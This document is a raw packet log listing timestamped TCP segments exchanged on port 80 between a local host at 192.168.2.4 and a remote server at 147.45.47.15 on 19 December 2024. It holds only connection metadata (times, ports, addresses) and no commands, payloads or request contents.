Dec 19, 2024 08:52:38.057966948 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.058602095 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.058614016 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.058873892 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.059289932 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.059303045 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.059346914 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.059973001 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.059986115 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.060023069 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.060699940 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.060714006 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.060725927 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.060770035 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.060786963 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.061342955 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.061356068 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.061470032 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.062019110 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.062031984 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.062077045 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.062681913 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.062773943 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.062849045 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.063384056 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.063396931 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.063407898 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.063452005 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.064070940 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.064085007 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.064116001 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.064739943 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.064753056 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.065443993 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.065463066 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.065502882 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.065718889 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.066093922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.066107035 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.066148996 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.066792011 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.066804886 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.066817999 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.066853046 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.067337036 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.067456007 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.067471027 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.067527056 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.068140984 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.068152905 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.068844080 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.068856955 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.069519997 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.069533110 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.069545031 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.069577932 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.069719076 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.069719076 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.070183992 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.070197105 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.070233107 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.070857048 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.070868969 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.071346998 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.071554899 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.071567059 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.071603060 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.072233915 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.072246075 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.072268009 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.072901964 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.072911978 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.072921991 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.072962046 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.073576927 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.073589087 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.073626041 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.073719978 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.074311018 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.074327946 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.074979067 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.074991941 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.075030088 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.075335026 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.075651884 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.075664997 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.075675964 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.076387882 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.076400995 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.076438904 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.077019930 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.077032089 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.077692032 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.077706099 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.077721119 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.077721119 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.077747107 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.078356028 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.078367949 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.078378916 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.078407049 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.079061031 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.079071999 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.079109907 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.079341888 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.079740047 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.079751968 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.079785109 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.080435038 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.080446959 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.080486059 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.081088066 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.081105947 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.081145048 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.081774950 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.081788063 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.081798077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.081825018 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.081852913 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.082464933 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.082475901 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.082598925 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.083133936 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.083147049 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.083187103 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.083812952 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.083825111 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.083862066 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.084510088 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.084520102 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.084531069 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.084553957 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.085231066 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.085242033 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.085261106 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.085853100 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.085865021 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.085897923 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.086530924 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.086541891 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.086580038 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.087299109 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.087316990 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.087353945 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.087910891 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.087923050 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.087934017 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.087949991 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.087973118 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.088562965 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.088574886 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.088619947 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.089267015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.089278936 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.089315891 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.089960098 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.089972973 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.089982986 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.090022087 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.090081930 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.090622902 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.090634108 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.090682983 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.091306925 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.091326952 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.091480017 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.091984034 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.091995001 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.092030048 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.092654943 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.092705011 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.092746973 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.093092918 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.093749046 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.093806982 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.094006062 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.095362902 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.095415115 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.095526934 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.096395969 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.096409082 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.096455097 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.097140074 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.097196102 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.097491980 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.098160028 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.098228931 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.098486900 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.099000931 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.099051952 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.099119902 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.099894047 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.099945068 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.100052118 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.100873947 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.100919962 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.101052046 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.101747036 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.101809025 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.101870060 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.102603912 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.102654934 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.102790117 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.103589058 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.103632927 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.103733063 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.104465008 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.104515076 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.104671955 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.105510950 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.105555058 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.105567932 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.106257915 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.106307030 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.106450081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.107322931 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.107336044 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.107364893 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.108087063 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.108129025 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.108439922 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.109011889 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.109055996 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.109213114 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.109916925 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.109960079 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.110028028 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.110107899 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.110759020 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.110838890 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.110949993 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.111674070 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.111715078 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.111843109 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.112694979 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.112740993 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.112754107 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.113619089 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.113655090 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.113671064 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.114363909 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.114468098 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.146406889 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.150280952 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.150366068 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.150432110 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.150855064 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.151061058 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.151324034 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.151369095 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.152066946 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.152112007 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.152296066 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.153254986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.153304100 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.153470039 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.154207945 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.154263973 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.154603004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.155348063 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.155396938 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.155570984 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.156411886 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.156462908 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.156661987 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.157510996 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.157578945 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.157670021 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.158588886 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.158636093 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.158777952 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.159816027 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.159873009 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.159944057 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.160763025 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.160809994 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.160979986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.161896944 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.161973000 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.162056923 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.163084030 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.163098097 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.163137913 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.164087057 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.164134979 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.164206028 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.165191889 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.165227890 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.165296078 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.166233063 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.166284084 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.166347027 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.167366982 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.167411089 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.167515993 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.168512106 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.168561935 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.168723106 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.169493914 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.169534922 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.169661045 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.170578003 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.170723915 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.170751095 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.171649933 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.171705008 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.171816111 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.172827005 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.173032999 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.173057079 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.173832893 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.173887968 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.173974037 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.175059080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.175107002 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.175163984 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.176099062 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.176145077 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.176498890 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.177285910 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.177299976 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.177340031 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.178347111 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.178360939 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.178397894 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.179286003 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.179467916 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.179513931 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.180377007 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.180417061 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.180521011 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.181473970 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.181524038 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.181638002 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.182533979 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.182579041 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.182718992 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.183626890 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.183681965 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.183770895 CET	80	49730	147.45.47.15	192.168.2.4
